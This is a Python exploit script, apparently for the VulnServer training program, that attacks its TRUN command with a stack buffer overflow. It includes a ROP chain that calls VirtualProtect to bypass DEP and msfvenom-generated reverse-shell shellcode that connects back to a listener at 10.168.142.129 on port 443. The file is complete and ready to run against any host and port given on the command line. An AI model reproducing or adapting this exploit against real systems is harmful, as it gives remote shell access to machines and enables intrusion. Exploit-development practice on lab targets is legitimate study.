#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/04/25 21:03:15 dhn Exp $

import socket
import struct
import argparse

class Exploit:
    def __init__(self, server, port, payload):
        self._payload = payload
        self._server = server
        self._port = port

    def __connect(self):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self._server, self._port))
        return s


    def run(self):
        try:
            s = self.__connect()
            print("[+] Sending payload...")
            s.send("TRUN ." + self._payload + "\r\n")
            s.recv(1024)
            s.close()
        except socket.error:
            print("[!] Socket error...")
            return 1


def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x76755603,  # POP ECX # RETN [RPCRT4.dll]
        0x6250609c,  # ptr to &VirtualProtect() [IAT essfunc.dll]
        0x7663fd52,  # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll]
        0x77717dee,  # POP EBP # RETN [ntdll.dll]
        0x625011bb,  # & jmp esp [essfunc.dll]
        0x76163d03,  # POP EAX # RETN [msvcrt.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x76622fd0,  # NEG EAX # RETN [MSCTF.dll]
        0x7663f9f1,  # XCHG EAX,EBX # RETN [MSCTF.dll]
        0x76101cf2,  # POP EAX # RETN [msvcrt.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x7677dae9,  # NEG EAX # RETN [RPCRT4.dll]
        0x77736d70,  # XCHG EAX,EDX # RETN [ntdll.dll]
        0x7670c705,  # POP ECX # RETN [RPCRT4.dll]
        0x760a3630,  # &Writable location [NSI.dll]
        0x7675778c,  # POP EDI # RETN [RPCRT4.dll]
        0x76711645,  # RETN (ROP NOP) [RPCRT4.dll]
        0x7610a837,  # POP EAX # RETN [msvcrt.dll]
        0x90909090,  # nop
        0x777227c4,  # PUSHAD # RETN [ntdll.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

def main(args):
    # msfvenom -p windows/shell_reverse_tcp LHOST=10.168.142.129 LPORT=443 \
    #        -f py -v shell -o shell -b '\x00' EXITFUNC=thread
    shellcode = (
        "\xda\xc8\xb8\x2a\x06\xb7\x1b\xd9\x74\x24\xf4\x5b\x33"
        "\xc9\xb1\x52\x83\xc3\x04\x31\x43\x13\x03\x69\x15\x55"
        "\xee\x91\xf1\x1b\x11\x69\x02\x7c\x9b\x8c\x33\xbc\xff"
        "\xc5\x64\x0c\x8b\x8b\x88\xe7\xd9\x3f\x1a\x85\xf5\x30"
        "\xab\x20\x20\x7f\x2c\x18\x10\x1e\xae\x63\x45\xc0\x8f"
        "\xab\x98\x01\xd7\xd6\x51\x53\x80\x9d\xc4\x43\xa5\xe8"
        "\xd4\xe8\xf5\xfd\x5c\x0d\x4d\xff\x4d\x80\xc5\xa6\x4d"
        "\x23\x09\xd3\xc7\x3b\x4e\xde\x9e\xb0\xa4\x94\x20\x10"
        "\xf5\x55\x8e\x5d\x39\xa4\xce\x9a\xfe\x57\xa5\xd2\xfc"
        "\xea\xbe\x21\x7e\x31\x4a\xb1\xd8\xb2\xec\x1d\xd8\x17"
        "\x6a\xd6\xd6\xdc\xf8\xb0\xfa\xe3\x2d\xcb\x07\x6f\xd0"
        "\x1b\x8e\x2b\xf7\xbf\xca\xe8\x96\xe6\xb6\x5f\xa6\xf8"
        "\x18\x3f\x02\x73\xb4\x54\x3f\xde\xd1\x99\x72\xe0\x21"
        "\xb6\x05\x93\x13\x19\xbe\x3b\x18\xd2\x18\xbc\x5f\xc9"
        "\xdd\x52\x9e\xf2\x1d\x7b\x65\xa6\x4d\x13\x4c\xc7\x05"
        "\xe3\x71\x12\x89\xb3\xdd\xcd\x6a\x63\x9e\xbd\x02\x69"
        "\x11\xe1\x33\x92\xfb\x8a\xde\x69\x6c\xbf\xb6\xff\xed"
        "\xd7\xc4\xff\xec\x9c\x40\x19\x84\xf2\x04\xb2\x31\x6a"
        "\x0d\x48\xa3\x73\x9b\x35\xe3\xf8\x28\xca\xaa\x08\x44"
        "\xd8\x5b\xf9\x13\x82\xca\x06\x8e\xaa\x91\x95\x55\x2a"
        "\xdf\x85\xc1\x7d\x88\x78\x18\xeb\x24\x22\xb2\x09\xb5"
        "\xb2\xfd\x89\x62\x07\x03\x10\xe6\x33\x27\x02\x3e\xbb"
        "\x63\x76\xee\xea\x3d\x20\x48\x45\x8c\x9a\x02\x3a\x46"
        "\x4a\xd2\x70\x59\x0c\xdb\x5c\x2f\xf0\x6a\x09\x76\x0f"
        "\x42\xdd\x7e\x68\xbe\x7d\x80\xa3\x7a\x9d\x63\x61\x77"
        "\x36\x3a\xe0\x3a\x5b\xbd\xdf\x79\x62\x3e\xd5\x01\x91"
        "\x5e\x9c\x04\xdd\xd8\x4d\x75\x4e\x8d\x71\x2a\x6f\x84"
    )

    # stage 1: make the stack executable
    rop_chain = create_rop_chain()

    # payload: 2241 bytes 
    payload = "A" * 2006 + rop_chain + "\x90" * 4 + shellcode

    # fire and forget!
    exploit = Exploit(args.host, int(args.port), payload)
    print("[+] VulnServer TRUN; DEP bypass exploit by dhn")
    print("[+] Exploiting %s:%s" % (args.host, args.port))

    if exploit.run():
        print("[!] Fail")
    else:
        print("[+] Done")


if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('--host', required=True)
    parser.add_argument('--port', required=True)
    args = parser.parse_args()

    main(args)
